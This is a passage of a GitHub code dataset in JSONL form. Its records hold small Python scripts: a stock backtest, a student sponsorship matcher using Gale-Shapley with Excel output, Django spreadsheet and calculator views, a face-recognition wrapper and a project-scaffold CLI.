+{"seq_id": "19161791299", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport get_cn_data as gcd\n\nticker_name = str(input(\"Enter ticker number: \"))\ngetter = gcd.stock_data(ticker_name)\ngetter.get_stock_price()\nticker = getter.get_ticker()\n\nCAPITAL = 1000000\n\nfile = \"../cn_intraday/\" + ticker + \".csv\"\ndf = pd.read_csv(file)\ndf['delta'] = df['close'].diff()\ndf['delta'][df['delta'] > 0] = 1\ndf['delta'][df['delta'] < 0] = -1\ndf['delta'][df['delta'] == 0] = 0\nfor i in range(5):\n\tdf['delta' + str(i)] = df['delta'].shift(i)\n\ndf['delta_score'] = df[['delta', 'delta0', 'delta1', 'delta2', 'delta3', 'delta4']].sum(axis = 1, skipna = False)\ndf['alpha'] = -df['delta_score'].shift(1)\ndf['alpha_adjusted'] = df['alpha'] / 5\ndf['capital_alloc'] = df['alpha_adjusted'] * CAPITAL\ndf['pct_change'] = df['close'].pct_change()\ndf['daily_pnl'] = df['capital_alloc'] * df['pct_change']\n\n# calculate sharpe ratio (if using daily data)\nsharpe = np.sqrt(252) * (df['daily_pnl'].mean() - 0.04 / 252) / df['daily_pnl'].std()\nprint('sharpe ratio is : ', sharpe)\n\n\n# plot graph\nplt.plot(df['daily_pnl'].cumsum())\nplt.show()", "repo_name": "hantop/CN-Trade", "sub_path": "strategies/based_on_5day_change.py", "file_name": "based_on_5day_change.py", "file_ext": "py", "file_size_in_byte": 1104, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "get_cn_data.stock_data", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "6316971321", "text": "from __future__ import unicode_literals\nimport random\nfrom copy import copy\nimport xlrd\nfrom xlrd import open_workbook\nimport xlwt\nimport numpy as np\n\n\"\"\"Ce qui suit est une partie d'un code trouvé sur internet que j'ai modifié pour le faire marcher bien dans\nle cas des familles de parrainage.\nPour obtenir les familles sans essayer de comprendre le code, aller à la fin de ce document.\nNe pas oublier de mettre 'individual.py' dans le même dossier afin de pouvoir l'importer \"\"\"\n\nclass Individual():\n #constructeur :\n def __init__(self, nom, reponses, famille):\n self.nom = nom\n self.reponses = reponses[:-1]\n self.famille=-1\n for x in famille:\n if x[1]==nom:\n self.famille=x[0]\n self.preference_list = []\n self.available_proposals = []\n self.partner = None\n self.moy_lovesc=-1\n\n #Fonction de copie :\n def copiage(self):\n cop=Individual(\"\",[],[])\n cop.nom = self.nom\n cop.reponses = self.reponses\n cop.famille=self.famille\n cop.preference_list =[]\n cop.available_proposals =[]\n cop.partner = None\n cop.moy_lovesc= -1\n return(cop)\n\n \"\"\"Si ça marche pas, peut être que dé-commenter la section ci-dessus résolvera le problème\n (idem que pour la classe MarriagesSimulation, je me sers pas de tout mais je me rapelle plus si ce dont\n je me sert plus je peux le supprimer ou pas, donc je l'ai commenté au cas ou)\"\"\"\n\n output = ('nom={0} '\n 'partner={1}'.format(\n self.nom,\n self.partner.nom if self.partner else None))\n return output\n\n\n## Lovescore\n\n#On configure un tableau pour pondérer les réponses :\nponde = [4,2,1,1,2,2,1,1,3,6,3,15,7] #A modifier selon l'ordre des questions\n\ndef moyenne(l):\n s=0\n for x in l:\n s+=x\n return(s/len(l))\n\ndef LoveScore(Romeo,Juliet,p=ponde):\n r1,r2=Romeo.reponses, Juliet.reponses\n nbReponses = len(r1)\n s=0\n for k in range(nbReponses): #On commence a 2 pour éviter le nom et la famille\n if k ==0 : #traitement spécial pour les listes\n for x in r1[k]:\n if x in r2[k]:\n if x==\"Pas de liste\":\n s-=3*p[k]\n else:\n s-=p[k]\n elif k == 2 : #idem pour la musique\n for x in r1[k]:\n if x in r2[k]:\n if x==\"Je suis aigri et j'aime pas la musique\":\n s-=3*p[k]\n else:\n s-=p[k]\n elif k == 3: #idem pour les centre d'intérêts artistiques\n for x in r1[k]:\n if x in r2[k]:\n if x==\"pas du tout\":\n s-=3*p[k]\n else:\n s-=p[k]\n elif k == 7: #idem pour le type de sport pratiqué\n for x in r1[k]:\n if x in r2[k]:\n if x==\"Pas de sport\":\n s=s\n else:\n s-=p[k]\n elif k == 6: #pour le but du sport on test juste l'égalité des deux\n if r1[k]!=r2[k]:\n s+=2*p[k]\n else:\n s+=abs(r1[k]-r2[k])*p[k] #Si ils répondent la même chose 0 points, plus il y a de points au total moins le match est bon\n return (max(s,0))\n\n#Modifier la fonction LoveScore si jamais le système de notation n'est pas satsfaisant\n\n## Marriage\n\nclass MarriagesSimulation():\n \"\"\"A simulation of men and women being matched with the Gale-Shapley\n algorithm.\"\"\"\n \"\"\"Ca je l'ai pris sur internet (flemme de faire un truc qui existe déjà) du coup comme j'ai modifié\n le reste de l'algo il y a des sections de MarriagesSimulation qui servent plus, mais comme ça fait\n longtemps je me rappelle plus si je peux les supprimer sans tout faire buger ou pas, du coup je laisse\"\"\"\n\n #Constructeur :\n def __init__(self, men,women):\n \"\"\"Initialize the fundamental components of the simulation.\n\n Args:\n size: The size of the simulation, in numbers of men, which will be\n the same as the number of women.\n \"\"\"\n self.men = men\n self.women = women\n self.size = len(men)\n self.sizew = len(women)\n fammax=-1\n for man in self.men :\n if man.famille>fammax:\n fammax=man.famille\n self.fmax=fammax\n\n #Fusion de deux mariage\n def merge(self,M2):\n self.men+=M2.men\n self.women+=M2.women\n self.size+=M2.size\n self.sizew+=M2.sizew\n self.fmax=max(M2.fmax,self.fmax)\n\n\n def debut(self):\n \"\"\"Pour remplir les available_proposals\"\"\"\n for i in self.men:\n i.available_proposals=self.women\n\n #Renvoie le nombre de parrain par famille :\n def fam_taille(self):\n taille=[0 for i in range(self.fmax+1)]\n for man in self.men :\n taille[man.famille]+=1\n return(taille)\n\n #Permet d'ajouter des parrains \"fantôme\" dans le cas où il y a plus de fillots que de parrains :\n def ajout_p(self):\n taille=self.fam_taille()\n nb_ajout=0\n men=[]\n for i in range(self.fmax+1):\n if taille[i]!=7:\n k=0\n man=self.men[0]\n while man.famille!=i:\n k+=1\n man=self.men[k]\n new=man.copiage()\n men.append(new)\n nb_ajout+=1\n return(men,nb_ajout)\n\n def populate(self):\n \"\"\"Populate the simulation with valid men and women.\"\"\"\n for i in range(0, self.size):\n self.men.append(Individual(i))\n for i in range(self.size, self.size * 2):\n self.women.append(Individual(i))\n\n def set_preferences(self):\n \"\"\"Set the preference list for all the men and women in this\n simulation.\"\"\"\n self.Moy_lovscore()\n women=self.tri_lovesc_women()\n for man in self.men:\n man.preference_list =[self.women[x[0]] for x in women]\n man.available_proposals =man.preference_list\n\n #Calcul de la moyenne de Lovescore pour chaque individu :\n def Moy_lovscore(self):\n echantw=[i for i in range(self.sizew)]\n echant=[i for i in range(self.size)]\n for man in self.men:\n random.shuffle(echant)\n love=[LoveScore(man,self.women[echantw[i]]) for i in range(self.sizew)]\n man.moy_lovesc=moyenne(love)\n for woman in self.women:\n random.shuffle(echant)\n love=[LoveScore(woman,self.men[echant[i]]) for i in range(self.size)]\n woman.moy_lovesc=moyenne(love)\n\n #Ordone les parrains par moyenne de Lovescore décroissant:\n def tri_lovesc_men(self):\n a=np.array([])\n type_men=[('pers',type(self.men[1])),('lv_sc',int)]\n men_sorted=np.array([(man,man.moy_lovesc) for man in self.men],dtype=type_men)\n men_sorted=np.sort(men_sorted,order=\"lv_sc\")\n return(men_sorted)\n\n #Ordone les fillots par moyenne de Lovescore décroissant:\n def tri_lovesc_women(self):\n type_women=[('pers',int),('lv_sc',int)]\n women_sorted=(np.array([(i,self.women[i].moy_lovesc) for i in range(self.sizew)],dtype=type_women))\n women_sorted.sort(order=\"lv_sc\")\n women_sorted=women_sorted.tolist()\n women_sorted.reverse()\n return(women_sorted)\n\n #Calcul le poids(Lovescore cummulé de tous les matchs) total du marriage et les parrains non matché (permet d'évaluer la performance du match):\n def poids(self):\n pds=0\n non_match=0\n for man in self.men:\n if man.partner==None:\n non_match+=1\n else:\n pds+= LoveScore(man.partner,man)\n return(pds,non_match)\n\n def random_id_list(self):\n \"\"\"Get a randomized list of indexes that may be used to refer to\n internal lists of men and women.\n\n Returns:\n A randomized list of indexes.\n \"\"\"\n id_list = [k for k in range(0, self.size)]\n random.shuffle(id_list)\n return id_list\n\n def random_idw_list(self):\n \"\"\"Get a randomized list of indexes that may be used to refer to\n internal lists of men and women.\n\n Returns:\n A randomized list of indexes.\n \"\"\"\n id_list = [k for k in range(0, self.sizew)]\n random.shuffle(id_list)\n return id_list\n\n def random_man_list(self):\n \"\"\"Get a randomized list of men from this simulation.\n\n Returns:\n A random list of Man objects.\n \"\"\"\n random_id_list = self.random_id_list()\n man_list = []\n for i in random_id_list:\n man_list.append(self.men[i])\n return man_list\n\n def random_woman_list(self):\n \"\"\"Get a randomized list of women from this simulation.\n\n Returns:\n A random list of Woman objects.\n \"\"\"\n random_id_list = self.random_idw_list()\n woman_list = []\n for i in random_id_list:\n woman_list.append(self.women[i])\n return woman_list\n\n def is_stable(self):\n \"\"\"Check if this simulation has reached a stable state.\n\n The simulation is considered stable if both members of a couple would\n not be happier with an alternative match.\n\n Returns:\n A boolean indicating the stability of this simulation.\n \"\"\"\n for woman in self.women:\n if not woman.partner:\n return False\n return True\n\n def pair_couple(self, man, woman):\n \"\"\"Pair two individuals.\n\n The man in this couple will no longer be able to propose\n to the specified woman.\n\n Args:\n man: The first individual.\n woman: The second individual.\n \"\"\"\n man.partner = woman\n woman.partner = man\n\n def free_couple(self, man, woman):\n \"\"\"Free two individuals.\n\n Args:\n man: The first individual.\n woman: The second individual.\n \"\"\"\n man.partner = None\n woman.partner = None\n\n def match(self):\n \"\"\"Perform the Gale-Shapley matching algorithm.\n\n Print new matches that are made and the state of the simulation\n between iterations.\n \"\"\"\n iterations = 0\n flts=0\n while not self.is_stable() and iterations<=100:\n iterations += 1\n s=0\n for man in self.men:\n s+=len(man.available_proposals)\n if not man.partner:\n for woman in man.available_proposals:\n if not woman.partner:\n\n self.pair_couple(man, woman)\n man.available_proposals.remove(woman)\n flts+=1\n break\n else:\n\n if LoveScore(man,woman) < LoveScore(woman.partner, woman):\n\n self.free_couple(woman.partner, woman)\n self.pair_couple(man, woman)\n man.available_proposals.remove(woman)\n break\n else:\n man.available_proposals.remove(woman)\n print(\"nb fillots ----> \", flts)\n\n\n def famille_liste(self): #récupère la liste des familles inscrites\n F=[]\n for man in self.men:\n if not(man.famille in F):\n F.append(man.famille)\n return(F)\n\n #Rempli le Excel avec les familles :\n def ecriture(self):\n wb = xlwt.Workbook('familles.xls') #création d'un fichier excel\n s = wb.add_sheet('A Test Sheet') #on crée une feuill de calcul\n familles=self.famille_liste()\n nbfam=len(familles)\n nb_membre_fam=[0 for x in familles] #stock le nombre de membre écrit dans chaque famille\n # écriture des entêtes :\n filts=0\n for i in range((nbfam//10)):\n x=3*i\n for j in range(10):\n y=10*j\n s.write(y,x+1,(10*i)+j+1,style_entete_d)\n s.write(y,x,\"Nom de la famille : \",style_entete_g)\n s.write(y+1,x,\"Parrains :\",style_parrains_ent)\n s.write(y+1,x+1,\"Fillots :\",style_fillots_ent)\n for j in range(nbfam%10):\n y=10*j\n x=(nbfam//10)*3\n s.write(y,x+1,Familles_g[(nbfam//10)*10+j][0],style_entete_d)\n s.write(y,x,\"Nom de la famille : \",style_entete_g)\n s.write(y+1,x,\"Parrains :\",style_parrains_ent)\n s.write(y+1,x+1,\"Fillots :\",style_fillots_ent)\n # écriture des noms :\n for man in self.men:\n famille=man.famille\n x=(famille//10)*3\n y=10*(famille%10)+2+nb_membre_fam[famille]\n if nb_membre_fam[famille]!=6:\n s.write(y,x,man.nom,style_parrains)\n if man.partner!=None :\n s.write(y,x+1,man.partner.nom,style_fillots)\n filts+=1\n else :\n s.write(y,x+1,\" \",style_fillots)\n else:\n s.write(y,x,man.nom,style_parrains_fin)\n if man.partner!=None :\n s.write(y,x+1,man.partner.nom,style_fillots_fin)\n filts+=1\n else :\n s.write(y,x+1,\" \",style_fillots_fin)\n nb_membre_fam[famille]+=1\n # fin de la mise en page :\n for i in range(len(nb_membre_fam)):\n f=nb_membre_fam[i]\n for j in range(f,7):\n y=((10*((i)%10))+j)+2\n x=((i)//10)*3\n if j!=6:\n s.write(y,x,\" \",style_parrains)\n s.write(y,x+1,\" \",style_fillots)\n else:\n s.write(y,x,\" \",style_parrains_fin)\n s.write(y,x+1,\" \",style_fillots_fin)\n print(filts)\n wb.save('familles.xls')\n\n def __str__(self):\n men_outputs = []\n for man in self.men:\n men_outputs.append(u'\\t' + str(man))\n men_string = '\\n'.join(men_outputs)\n women_outputs = []\n for woman in self.women:\n women_outputs.append('\\t' + str(woman))\n women_string = '\\n'.join(women_outputs)\n return ('Men:\\n'\n '{0}\\n'\n 'Women:\\n'\n '{1}'.format(men_string, women_string))\n\n## Algo famille\n\n## Fonctions de lecture fichier\n#Ouverture des feuilles :\n\nparrains=xlrd.open_workbook(\"Questionnaire Parrain-Fillot (Parrains).xlsx\")\nshnp=parrains.sheet_names()\nshp=parrains.sheet_by_name(shnp[1]) #Feuille qui m'interresse\nshfam=parrains.sheet_by_name(shnp[3]) #feuille avec les familles\nshfampers=parrains.sheet_by_name(shnp[2]) #feuille avec les corespondances familles/personnes\n\ndef ListeFamille():\n n=shfam.ncols\n l=shfam.row_values(1)\n famille_id=[(l[i],i) for i in range(1,n)]\n return(famille_id)\n\ndef ListeFamille_Pers():\n n=shfampers.ncols\n l=[]\n fam_pers=[]\n for i in range(6):\n l.append(shfampers.row_values(i+1)[1:])\n for i in range(6):\n for k in range(len(l[i])):\n if l[i][k]!=\"\":\n fam_pers.append((k,(l[i][k])))\n return(fam_pers)\n\nFamilles_g=ListeFamille()\nCompFam=ListeFamille_Pers()\n\ndef ListeParrains():\n #EI2={} <-- Si on voulait faire avec un dictionnaire\n EI2=[]\n n=shp.ncols\n for k in range(1,shp.nrows):\n l=shp.row_values(k)\n #EI2[\"EI2\"+str(k)]=[l[1],l[2:n]] <-- Idem\n EI2+=[Individual(l[1],l[3:16],CompFam)]\n return(EI2)\n\nfillots=xlrd.open_workbook(\"Questionnaire Parrain-Fillot (fillots) (réponses).xlsx\")\nshnf=fillots.sheet_names() #Noms des feuilles\nshf=fillots.sheet_by_name(shnf[0]) #Feuille qui m'interresse\n\ndef ListeFillots():\n EI1=[]\n n=shf.ncols\n for k in range(1,shf.nrows):\n l=shf.row_values(k)\n EI1+=[Individual(l[1],l[3:16],CompFam)]\n return(EI1)\n\n\n## Exploitation des réponses\n\ndef transformationrep(EI):\n for i in EI:\n j=i.reponses\n j[0]=j[0].split(\", \")\n j[2]=j[2].split(\", \")\n j[3]=j[3].split(\", \")\n j[4]=int(j[4].replace(\"Seulement les soirs de pleine lune\",\"0\").replace(\"Une fois de temps en temps\",\"1\").replace(\"Quelques fois par semaine\",\"2\").replace(\"Une fois par jour\",\"3\"))\n j[5]=int(j[5].replace(\"Le dimanche à 15h32 s'il fait beau\",\"0\").replace(\"Une fois par semaine\",\"1\").replace(\"Plusieurs fois par semaine\",\"2\").replace(\"Une fois par jour\",\"3\"))\n j[7]=j[7].split(\", \")\n j[8]=int(j[8].replace(\"Alterner entre grec et coquillettes ça compte ?\",\"0\").replace(\"Oh oui, et les trucs bien gras ça me connait !\",\"1\").replace(\"J'aime cuisiner le WE ou quand j'ai le temps\",\"2\").replace(\"Je fais toujours attention à bien manger\",\"3\"))\n j[10]=int(j[10].replace(\"Jamais\",\"0\").replace(\"Une fois par mois\",\"1\").replace(\"Une fois par semaine\",\"2\").replace(\"Une fois par jour (voire plus)\",\"4\").replace(\"Plusieurs fois par semaine\",\"3\"))\n j[11]=int(j[11].replace(\"Tu viens pas\",\"0\").replace(\"Tu te poses dans un coin, chill !!\",\"1\").replace(\"Objectif grosse défonce\",\"2\").replace(\"T'enflammes le dancefloor\",\"3\"))\n return(EI)\n\n\ndef epure(EI): #Pas necessaire si vous trouvez un moyen d'authentifier chaque personne et que chaque\n #personne de réponde qu'une fois\n N=[] #liste des noms\n Nt=[] #liste des noms sans doublets\n L=[] #liste qui va contenir les Ei sans doublet\n for i in EI:\n N+=[i.nom]\n for i in N:\n if i in Nt:\n L[Nt.index(i)]=EI[N.index(i)]\n else:\n Nt+=[i]\n L+=[EI[N.index(i)]]\n return(L)\n## écriture\n\n#styles des cases (bordures et fond)\n\nstyle_entete_g= xlwt.easyxf('font: bold on, color black;\\\nborders: top_color black, bottom_color black, left_color black,\\\nleft thin, top thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_entete_d= xlwt.easyxf('font: bold on, color black;\\\nborders: top_color black, bottom_color black,right_color black ,\\\nright thin, top thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_fillots_ent= xlwt.easyxf('font: bold on, color black;\\\nborders:right_color black,\\\nright thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_parrains_ent= xlwt.easyxf('font: bold on, color black;\\\nborders:left_color black,\\\nleft thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_fillots= xlwt.easyxf('font: bold off, color black;\\\nborders:right_color black,\\\nright thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_parrains= xlwt.easyxf('font: bold off, color black;\\\nborders:left_color black,\\\nleft thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_fillots_fin= xlwt.easyxf('font: bold off, color black;\\\nborders: bottom_color black,right_color black,\\\nright thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\nstyle_parrains_fin= xlwt.easyxf('font: bold off, color black;\\\nborders:bottom_color black,left_color black,\\\nleft thin,bottom thin;\\\npattern: pattern solid, fore_color white; align : horiz center ;protection:cell_locked false;')\n\n## Algo a lancer\n\ndef algo():\n P=transformationrep(ListeParrains()) #on récupère les informations des parrains\n\n F=transformationrep(ListeFillots()) #on récupère les informations des parrains\n M=MarriagesSimulation(P,F)\n M.set_preferences()\n M.match() #ca va tourner puis afficher les couples en premier Liste1, partenaire=Liste\n #Ajoute des parrains \"fantômes\" et refait des matchs dans le cas où il y ait plus de fillots que de parrains\n while M.sizew>M.size:\n nouv_fillots=[]\n a_enlever=[]\n for i in range(M.sizew):\n if M.women[i].partner==None:\n nouv_fillots.append((M.women[i]).copiage())\n a_enlever.append(i)\n for i in range(len(a_enlever)-1,-1,-1):\n inutile=M.women.pop(a_enlever[i])\n M.sizew-=1\n if nouv_fillots!=[]:\n nouv_parr,nbparr=M.ajout_p()\n M2=MarriagesSimulation(nouv_parr,nouv_fillots)\n M2.set_preferences()\n M2.match()\n M.merge(M2)\n M.ecriture() #Ecriture dans le Excel\n return(M)\n #, suivi de Liste2, partenaire= Liste1\n #Juste la première liste suffit donc\n", "repo_name": "wlucasw/Parrainage", "sub_path": "mariage_new.py", "file_name": "mariage_new.py", "file_ext": "py", "file_size_in_byte": 20907, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.shuffle", "line_number": 190, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 209, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 245, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 352, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 428, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 465, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 513, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 518, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 523, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 528, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 533, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 538, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 543, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 548, "usage_type": "call"}]}
+{"seq_id": "70235018728", "text": "import openpyxl\nfrom django.http import HttpResponse\n\nfrom cciw.officers.views.utils.data_retention import DATA_RETENTION_NOTICES_TXT, DataRetentionNotice\nfrom cciw.utils import xl\nfrom cciw.utils.spreadsheet import ExcelBuilder\n\n\ndef spreadsheet_response(\n builder: ExcelBuilder,\n filename: str,\n *,\n notice: DataRetentionNotice | None,\n) -> HttpResponse:\n output = builder.to_bytes()\n\n if notice is not None:\n workbook: openpyxl.Workbook = xl.workbook_from_bytes(builder.to_bytes())\n sheet = workbook.create_sheet(\"Notice\", 0)\n c_header = sheet.cell(1, 1)\n c_header.value = \"Data retention notice:\"\n c_header.font = xl.header_font\n\n for row_idx, line in enumerate(notice_to_lines(notice), start=3):\n c = sheet.cell(row_idx, 1)\n c.value = line\n c.font = xl.default_font\n sheet.column_dimensions[\"A\"].width = 100\n\n output = xl.workbook_to_bytes(workbook)\n response = HttpResponse(output, content_type=builder.mimetype)\n response[\"Content-Disposition\"] = f\"attachment; filename={filename}.{builder.file_ext}\"\n return response\n\n\ndef notice_to_lines(notice: DataRetentionNotice) -> list[str]:\n txt = DATA_RETENTION_NOTICES_TXT[notice]\n return list(txt.split(\"\\n\"))\n", "repo_name": "cciw-uk/cciw.co.uk", "sub_path": "cciw/officers/views/utils/spreadsheets.py", "file_name": "spreadsheets.py", "file_ext": "py", "file_size_in_byte": 1284, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cciw.utils.spreadsheet.ExcelBuilder", "line_number": 10, "usage_type": "name"}, {"api_name": "cciw.officers.views.utils.data_retention.DataRetentionNotice", "line_number": 13, "usage_type": "name"}, {"api_name": "openpyxl.Workbook", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cciw.utils.xl.workbook_from_bytes", "line_number": 18, "usage_type": "call"}, {"api_name": "cciw.utils.xl", "line_number": 18, "usage_type": "name"}, {"api_name": "cciw.utils.xl.header_font", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cciw.utils.xl", "line_number": 22, "usage_type": "name"}, {"api_name": "cciw.utils.xl.default_font", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cciw.utils.xl", "line_number": 27, "usage_type": "name"}, {"api_name": "cciw.utils.xl.workbook_to_bytes", "line_number": 30, "usage_type": "call"}, {"api_name": "cciw.utils.xl", "line_number": 30, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 14, "usage_type": "name"}, {"api_name": "cciw.officers.views.utils.data_retention.DataRetentionNotice", "line_number": 36, "usage_type": "name"}, {"api_name": "cciw.officers.views.utils.data_retention.DATA_RETENTION_NOTICES_TXT", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "70758828009", "text": "from typing import Optional, List\r\nfrom facekeeper.core import RecognizerInterface\r\nfrom facekeeper.matcher import EmbeddingsMatcher\r\nimport face_recognition\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport io\r\nimport base64\r\n\r\n\r\nclass Recognizer(RecognizerInterface):\r\n def __init__(self, model: str):\r\n self.model = model\r\n self.matcher = EmbeddingsMatcher()\r\n\r\n def get_id(self) -> str:\r\n return \"github.com/ageitgey/face_recognition:\" + self.model\r\n\r\n def calc_embedding(self, image: bytes) -> Optional[np.array]:\r\n img = read_file_to_array(image)\r\n embeddings = face_recognition.face_encodings(img, None, 1, self.model)\r\n if len(embeddings) != 1:\r\n return None\r\n\r\n return embeddings[0]\r\n\r\n def locate_faces(self, image: bytes) -> List[dict]:\r\n img = read_file_to_array(image)\r\n locations = face_recognition.face_locations(img, 1, \"fog\")\r\n result = []\r\n for i, location in enumerate(locations):\r\n top, right, bottom, left = location\r\n face = img[top:bottom, left:right]\r\n buffer = io.BytesIO()\r\n pil_image = Image.fromarray(face)\r\n pil_image.save(buffer, \"JPEG\")\r\n buffer = base64.b64encode(buffer.getvalue())\r\n result.append({\"top\": top, \"right\": right, \"bottom\": bottom, \"left\": left, \"contentBase64\": buffer})\r\n return result\r\n\r\n\r\ndef read_file_to_array(image_data: bytes, mode=\"RGB\") -> np.array:\r\n \"\"\"\r\n read_file_to_array(data bytes[, mode='RGB']) -> img\r\n .\r\n . The function load stream data to PIL.Image and returns converted\r\n . image as np.array\r\n .\r\n . @param image_data bytes\r\n . @param mode string.\r\n \"\"\"\r\n image = Image.open(io.BytesIO(image_data))\r\n if mode:\r\n image = image.convert(mode)\r\n return np.array(image)\r\n", "repo_name": "dairlair/facekeeper", "sub_path": "facekeeper/recognizer.py", "file_name": "recognizer.py", "file_ext": "py", "file_size_in_byte": 1899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "facekeeper.core.RecognizerInterface", "line_number": 11, "usage_type": "name"}, {"api_name": "facekeeper.matcher.EmbeddingsMatcher", "line_number": 14, "usage_type": "call"}, {"api_name": "face_recognition.face_encodings", "line_number": 21, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 19, "usage_type": "attribute"}, {"api_name": "face_recognition.face_locations", "line_number": 29, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 35, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 37, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 52, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 52, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "attribute"}]}
+{"seq_id": "8568054781", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Some description.\"\"\"\n\nimport logging\nimport argparse\nimport sys\n\nimport haircut.project\n\n\ndef main():\n\n if sys.version_info < (2,6) or sys.version_info > (2,8):\n raise SystemExit('Sorry, this code needs Python 2.6 or Python 2.7 (current: %s.%s)' % (sys.version_info[0], sys.version_info[1]))\n\n desc = \"Generate the scaffold for a basic python project.\"\n parser = argparse.ArgumentParser(description=desc)\n\n parser.add_argument(\"-p\", \"--project\", required=True,\n help=\"The name of the project directory.\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Increase output verbosity\")\n\n args = parser.parse_args()\n\n logging.basicConfig(format='%(asctime)s::%(levelname)s::%(module)s::%(message)s')\n logging.getLogger().setLevel(getattr(logging, 'INFO'))\n\n if args.verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n\n return haircut.project.Base(args.project).generate()\n", "repo_name": "grilo/haircut", "sub_path": "haircut/cli.py", "file_name": "cli.py", "file_ext": "py", "file_size_in_byte": 1029, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 16, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 32, "usage_type": "attribute"}, {"api_name": "haircut.project.project.Base", "line_number": 34, "usage_type": "call"}, {"api_name": "haircut.project.project", "line_number": 34, "usage_type": "attribute"}, {"api_name": "haircut.project", "line_number": 34, "usage_type": "name"}]}
+{"seq_id": "21531729680", "text": "from django.shortcuts import render\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, \"index.html\")\n\n\n# def is_odd_even(request, _number):\n# context = {\"number\": _number}\n\n# return render(request, \"is-odd-even.html\", context)\ndef check(request, _number):\n num = _number\n if num == 0:\n check = 0\n elif num % 2 == 0:\n check = \"짝수\"\n else:\n check = \"홀수\"\n context = {\"num\": num, \"check\": check}\n return render(request, \"is-odd-even.html\", context)\n\n\ndef calculate(request, _number, __number):\n num = _number\n num2 = __number\n context = {\n \"plus\": num + num2,\n \"minus\": num - num2,\n \"multiply\": num * num2,\n \"divide\": num // num2,\n }\n\n return render(request, \"calculate.html\", context)\n", "repo_name": "1c0332zz/TIL", "sub_path": "Django/3일차 변수의 절차/3일차 실습/p_0926_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 804, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", 